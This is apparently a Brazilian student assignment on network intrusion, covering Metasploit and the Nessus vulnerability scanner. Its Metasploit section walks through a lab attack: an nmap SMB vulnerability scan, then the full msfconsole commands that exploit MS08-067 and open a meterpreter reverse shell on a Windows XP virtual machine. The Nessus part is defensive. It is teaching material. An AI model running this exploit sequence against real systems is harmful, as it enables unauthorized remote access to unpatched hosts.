TRABALHO INTRUSÃO DE REDES



Documentos relacionados
Metasploit Sabe o que é?

O projeto Metasploit é um framework que foi criado em 2003 por HD Moore e é uma plataforma que permite a verificação do estado da segurança dos

Analisar e demonstrar a aplicação da ferramenta Metasploit. Vmware Player, Putty, Backtrack, Windows Server 2003, CentOS e Metasploit.

Como instalar uma impressora?

Nessus Vulnerability Scanner

Auditando e criando relatório de análise de vulnerabilidades com Nessus

SUMÁRIO 1. AULA 6 ENDEREÇAMENTO IP:... 2

Colégio Sinodal Progresso Curso Técnico Informática TI06. Ferramenta Nassus. Ismael Dullius Machado. Gerência de rede Cristiano Forte

Trabalhando com NAT no PFSense

CONFIGURAÇÃO DE REDE SISTEMA IDEAGRI - FAQ CONCEITOS GERAIS

3 SERVIÇOS IP. 3.1 Serviços IP e alguns aspectos de segurança

Passo a Passo da instalação da VPN

ALTERNATIVA PARA CONEXÃO VIA INTERNET DE IP MASCARADO A IP REAL

NetEye Guia de Instalação

LABORATÓRIO WIRESHARK: DNS

STK (Start Kit DARUMA) Utilizando conversor Serial/Ethernet com Mini-Impressora DR600/DR700.

SCPIWeb. SCPIWebDespRec Aplicação Web para Consulta de Despesas e Receitas ( Lei Complementar nº 131 de 27 Maio de 2009 )

Nesse artigo abordaremos os principais aspectos de instalação e uso do NTOP no Fedora Core 4.

Conexão rápida entre dois computadores em uma plataforma Linux

Linux Network Servers

Serviço Seguro de Mensagens Instantâneas

Capítulo 5 Métodos de Defesa

SAIBA MAIS SOBRE O LINUX E DESCUBRA QUAL DISTRIBUIÇÃO É MELHOR PARA VOCÊ! CURSO

3º Exercício Prático: DNS

HOW TO Procedimento para instalar Aker Firewall virtualizado no ESXi 5.0

Operador de Computador. Informática Básica

Procedimentos para Reinstalação do Sisloc

Procedimentos para Configuração de Redirecionamento de Portas

Omega Tecnologia Manual Omega Hosting

Introdução a Informática - 1º semestre AULA 02 Prof. André Moraes

3. No painel da direita, dê um clique com o botão direito do mouse em qualquer espaço livre (área em branco).

Instalando o Debian em modo texto

Na tela dele, clique no sinal de + ao lado do nome do seu computador, para expandi-lo. A seguir, expanda também o item "Sites da web".

(In)Segurança Virtual. Técnicas de Ataque e Defesa

Caro cliente. Guia do cliente. Página 1

Instalando software MÉDICO Online no servidor

Configurando o IIS no Server 2003

MULTIACERVO - VERSÃO 17.*

MANUAL DE UTILIZAÇÃO. HELP SUPORTE e HELP - REMOTO (Versão de usuário: 2.0)

IMPORTANTE: O PNM4R2 não entra em estado funcional enquanto o Windows não

Segurança exposta em Rede de Computadores. Security displayed in Computer network

EN3611 Segurança de Redes Prof. João Henrique Kleinschmidt Prática Wireshark Sniffer de rede

UDPcast Clonagem de HDs via rede utilizando

ArpPrintServer. Sistema de Gerenciamento de Impressão By Netsource Rev: 02

DNS DOMAIN NAME SERVER

INTRODUÇÃO: 1 - Conectando na sua conta

PROCEDIMENTOS PARA UTILIZAÇÃO DE NOVA VERSÃO DO JAVA

Daruma NFCe Conheça todos os passos para testar a NFCe Daruma

Manual de Utilização Autorizador

NetEye Guia de Instalação

Instalação Mesa Virtual 2.0 Impacta

Configuração de um servidor FTP. Campus Cachoeiro Curso Técnico em Informática

Sistemas de Informação Processamento de Dados

DarkStat para BrazilFW

TUTORIAL: MANTENDO O BANCO DE DADOS DE SEU SITE DENTRO DO DOMÍNIO DA USP USANDO O SSH!

Laboratório de Redes. Professora Marcela Santos

Introdução. O Windows Server 2003 está dividido em quatro versões:

CSAU Guia: Manual do CSAU 10.0 como implementar e utilizar.

Online Help StruxureWare Data Center Expert

Algumas das características listada nela:

Registro e Acompanhamento de Chamados

Gerenciamento de Redes de Computadores. Pfsense Introdução e Instalação

Instalação e utilização do Document Distributor

Configuração do Linux Educacional 5 para melhor uso do MonitorINFO-V4

Manual. Configuração do. Samba. Compartilhamento e Servidor Samba Linux. Produzido por: Sergio Graças Desenvolvedor do Projeto GNU/Linux VRlivre

TUTORIAL DE INSTALAÇÃO DO PFSENSE E UMA REDE INTERNA NO VIRTUALBOX

Como configurar s nos celulares. Ebook. Como configurar s no seu celular. W3alpha - Desenvolvimento e hospedagem na internet

GUIA MUDANÇA E FORMATAÇÃO DE SERVIDOR - MILLENNIUM

GUIA PRÁTICO DE INSTALAÇÃO

Entendendo como funciona o NAT

ADMINISTRAÇÃO DE SISTEMAS OPERACIONAIS SERVIÇOS IMPRESSÃO. Professor Carlos Muniz

UNIVERSIDADE FEDERAL DE PELOTAS

Guia do Usuário. versão 1.2. GiuSoft Tecnologia -

MANUAL DE INSTALAÇÃO

Noções de. Microsoft SQL Server. Microsoft SQL Server

COMPARTILHAMENTO DO DISCO E PERMISSÕES DE REDE PÚBLICAS E DE GRUPOS DE TRABALHO.

Procedimentos para configurar o Monitoramento Agendado no D-viewCam

GUIA MUDANÇA E FORMATAÇÃO DE SERVIDOR - SLIM

CONFIGURAÇÃO MINIMA EXIGIDA:

Desenvolvendo Websites com PHP

Atualização Mandatória de Versão do Amadeus Pro Web (2.0P431BR) 25 de junho de 2007 Gerência de Produtos & Operações Amadeus Brasil

ESTRUTUTA DE REDE DE ACESSO!

Sistema Operacional Unidade 12 Comandos de Rede e Acesso Remoto

CRIANDO BANCOS DE DADOS NO SQL SERVER 2008 R2 COM O SQL SERVER MANAGEMENT STUDIO

cio Roteamento Linux

- Wireless e NTP - 272

Guia Rápido de Instalação Ilustrado

Satélite. Manual de instalação e configuração. CENPECT Informática cenpect@cenpect.com.br

MDaemon GroupWare. Versão 1 Manual do Usuário. plugin para o Microsoft Outlook. Trabalhe em Equipe Usando o Outlook e o MDaemon

Procedimento para configuração de Redirecionamento de Portas

Configurando o sistema em rede Local

Instalando e usando o Document Distributor 1

Personata Recorder. Manual de Instalação e Configuração

Guia de Instalação SIAM. Internet Information Services - IIS 5.1 no Windows XP Pro

DNS DOMAIN NAME SERVER

Transcrição:

TRABALHO INTRUSÃO DE REDES

Software Metasploit Framework O que é > Metasploit Framework é uma avançada plataforma Open Source, concebida especificamente com o objetivo de reforçar e acelerar o desenvolvimento, ensaio e utilização de exploits. Escrito na maioria das vezes em "Perl" e com vários componentes desenvolvidos em "C e Assembler", sua portabilidade está assegurada, o que contribui em larga medida para a sua aceitação maciça, porque qualquer que seja a sua escolha de plataforma de uso, pode instalá-lo e desfrutar todos os seus poderes em poucos minutos e sem grandes dificuldades Executando uma intrusão Para que você possa ter uma boa noção de como o Metasploit realmente funciona, nada melhor que conseguir obter o acesso a uma máquina (virtual) e assim poder testar e estudar todas suas funcionalidades, ficando cada dia mais "afiado" em seus testes de intrusão. Sim, este artigo é bem básico. O cenário utilizado foi o seguinte: Neste caso são 2 máquinas virtuais (VMs) criadas usando o Virtualbox. As placas de rede de ambas VMs estão configuradas como bridge.

1ª VM = Sistema Operacional Backtrack 4 Final com endereço IP 192.168.0.170. 2ª VM = Sistema Operacional Windows XP SP2 com endereço IP 192.168.0.186. SCANNING COM NMAP E METASPLOIT Ok pessoal, vamos utilizar a ferramenta "nmap" para fazer o scanning em nossa rede interna. Abra um terminal no micro com o Backtrack e digite o seguinte comando: # nmap -v --script=smb-check-vulns 192.168.0.0/24 v = Modo Verbose --script=smb-check-vulns = Script para verificar vulnerabilidades conhecidas, como por exemplo, MS08-067, Conficker, regsvc DoS e SMBv2 exploit. 192.168.0.0/24 = Range de IP utilizado em minha rede local.

Se repararem, no host com endereço IP 192.168.0.186, verá que são mostradas as portas que estão abertas, e em MS08-067 está como VULNERABLE, tendo essa "simples" base, vamos atacá-lo. Certo, descobrimos um host dentro da nossa LAN que está possivelmente vulnerável ao nosso ataque pretendido! Agora vamos carregar o Metasploit. No terminal, basta digitar msfconsole e... Obtemos nosso console do msf. Feito isto, vamos efetuar a intrusão na máquina. Os comandos são os seguintes:

use exploit/windows/smb/ms08_067_netapi #Aqui falamos que queremos usar o exploit ms08_067_netapi set RHOST 192.168.0.186 #Aqui setamos o nosso host remoto, que no caso é o endereço IP da VM com Windows XP SP2 set PAYLOAD windows/meterpreter/reverse_tcp #Aqui especificamos o payload que iremos utilizar, reverse_tcp, ele é o responsável por criar a nossa comunicação entre LHOST e RHOST. set LHOST 192.168.0.170 #Aqui setamos nosso host local, que no caso é o endereço IP da VM com Backtrack 4. exploit #E finalmente executamos nosso exploit. Observe a imagem abaixo.

Pronto! Ganhamos nossa shell meterpreter, ou seja, já estamos na máquina alvo. Experimente dar os comandos sysinfo e ipconfig.

Software Tenable Nessus Tenable Nessus O Nessus é um software de auditoria de redes e varredura de vulnerabilidades que pode ser utilizado para descobrir falhas de segurança em sistemas UNIX e Windows. É possível ajustar o aplicativo para reproduzir a política de segurança de sua empresa, dos relatórios públicos das agências de segurança NSA, CERT e CIS, dentre outras. QUAL E A SUA FUNÇAO Tenable Nessus permite a sua função e permite a verificação de vulnerabilidade remota que pode ser utilizada para auditar sua internet com foco em endereços IP para a rede e vulnerabilidades de aplicações web a parti da nuvem. Ele executa a verificação da vulnerabilidade do ciclo de vida completo além do gerenciamento de configurações, empresas podem ainda comunicar recomendações responsáveis, acompanhar remediações e verificar os patches de segurança e configurações necessárias e muito mais.

Utilizando o nessus O Nessus utiliza um sistema cliente-servidor, onde uma vez iniciado o módulo servidor passa a ser possível rodar o cliente em qualquer máquina da rede (por esse motivo pode-se atribuir vários logins e senhas com permissões diversas). O certificado oferece uma segurança maior ao acessar o servidor Nessus, pois garante que ele não foi substituído por outra máquina comprometida. Ressaltando que em ambientes Windows somente é possível a instalação do Cliente NESSUS e não do Servidor(Gerente) O seguinte passo é inicializar o servidor, ainda como superusuário(root), usando o comando: # nessusd -D Após, volte ao seu login de usuário e abra o cliente, com o comando: $ nessus

Agora você deverá logar-se no servidor Nessus, fornecendo seu login e senha. Nas configurações do programa(abas superiores) você tem acesso a várias opções, entre elas a faixa de portas TCP e UDP que devem ser escaneadas:

Se você quiser um teste completo, use a faixa 1-65536. Este teste é ideal para PCs da rede local, mas pode demorar bastante caso seja feito via Internet. Basicamente, ele envia um pacote TCP e outro pacote UDP para cada porta e para cada PC a ser testado. Se você quiser testar uma faixa inteira de endereços IP, com seus 255 PCs teremos nada menos que 33.423.360 pacotes, que correspondem a mais de 750 MB de dados. Alguns testes do Nessus podem travar alguns PCs vulneráveis, como por exemplo estações Windows 95 vulneráveis ao "ping da morte". A opção "Safe checks" desativa testes potencialmente perigosos, evitando prejuízos aos usuários. De qualquer forma, o ideal é fazer o teste à noite, ou em algum horário em que os PCs não estejam sendo utilizados. Na seção "Target Selection" você define o alvo, fornecendo seu IP. Se você quiser testar as vulnerabilidades da própria máquina local, o endereço é o "localhost". Se você quiser testar de uma vez toda a sua rede local, basta fornecer o endereço da rede, como em "192.168.0.0" ou "10.0.0.0". Concluído o teste, ele exibe uma lista com as vulnerabilidades encontradas em cada PC. Existem três níveis de alerta, o primeiro e mais grave tem o símbolo de uma luz vermelha e indica uma brecha de segurança em um servidor ativo na máquina. O screenshot abaixo por exemplo temos uma máquina Linux rodando uma versão antiga do Samba, que permite que clientes não autorizados se loguem no servidor. Além de apontar o problema, o Nessus oferece uma descrição detalhada da vulnerabilidade e aponta uma solução. No caso a solução é simplesmente atualizar o Samba para uma versão mais recente:

O segundo nível é um alerta de que um serviço potencialmente inseguro está ativo numa determinada porta do sistema, como por exemplo um servidor Telnet ou XDMCP (para obter a tela de login do servidor, como vimos no capítulo 7). Neste caso não foi encontrada nenhuma vulnerabilidade específica, mas o fato o serviço ser fundamentalmente inseguro já representa uma brecha de segurança. Tanto o Telnet quanto o XDMCP transmitem dados de forma não encriptada, o que permite que alguém mal intencionado possa sniffar a rede, capturando os dados transmitidos, incluindo as senhas dos usuários.

O terceiro nível de alerta tem o símbolo de uma luz. Estes são apenas lembretes de que existe um servidor ativo na porta indicada mas sem que fosse detectada qualquer brecha de segurança: Naturalmente, assim como você pode utilizar o Nessus para detectar e tapar brechas de segurança, outras pessoas podem utilizá-lo para detectar suas vulnerabilidades e lançar ataques. Hoje em dia a variedade de scripts e ferramentas gráficas prontas que exploram vulnerabilidades é tão grande que você pode encontrar algum exploit fácil de usar para praticamente qualquer vulnerabilidade que você possa encontrar. Basta saber fazer pesquisas no Google.

Estes exploits prontos são o grande perigo, pois não requerem nenhum tipo de prática ou habilidade para serem usados. Basta indicar o IP a ser atacado e pronto. Ou seja, aquele garoto com quem você brigou no chat pode muito bem fazer um estrago na sua rede caso você tenha alguma vulnerabilidade grave, por isso é importante resolver o problema antes que alguém o faça por você. O Nessus é só o primeiro passo. Caso você rode qualquer tipo de servidor na sua máquina é importante acompanhar sites especializados em notícias relacionadas à segurança, c omo o http://lwn.net/- e o http://www.linuxsecurity.com/. A maioria das distribuições oferecem boletins por e-mail que avisam quando novas atualizações de segurança estão disponíveis. Lembre-se que apesar das notícias de brechas e atualizações serem sempre muito frequentes, você só precisa se preocupar com os servidores que você mantém ativos na sua máquina. Se você mantém apenas o SSH e o Proftp por exemplo, não precisa se preocupar com as atualizações do Apache e do Sendmail. Além dos servidores, clientes de e-mail (Evolution, Kmail etc) e navegadores (Konqueror, Mozilla etc) também costumam receber atualizações de segurança com uma certa frequência.

CAMPUS : PARQUE DAS ROSAS Moisés Daniel Henrique Lage Marcia Gomes Wellington das Mercês Dionata Araujo Elizabete Santos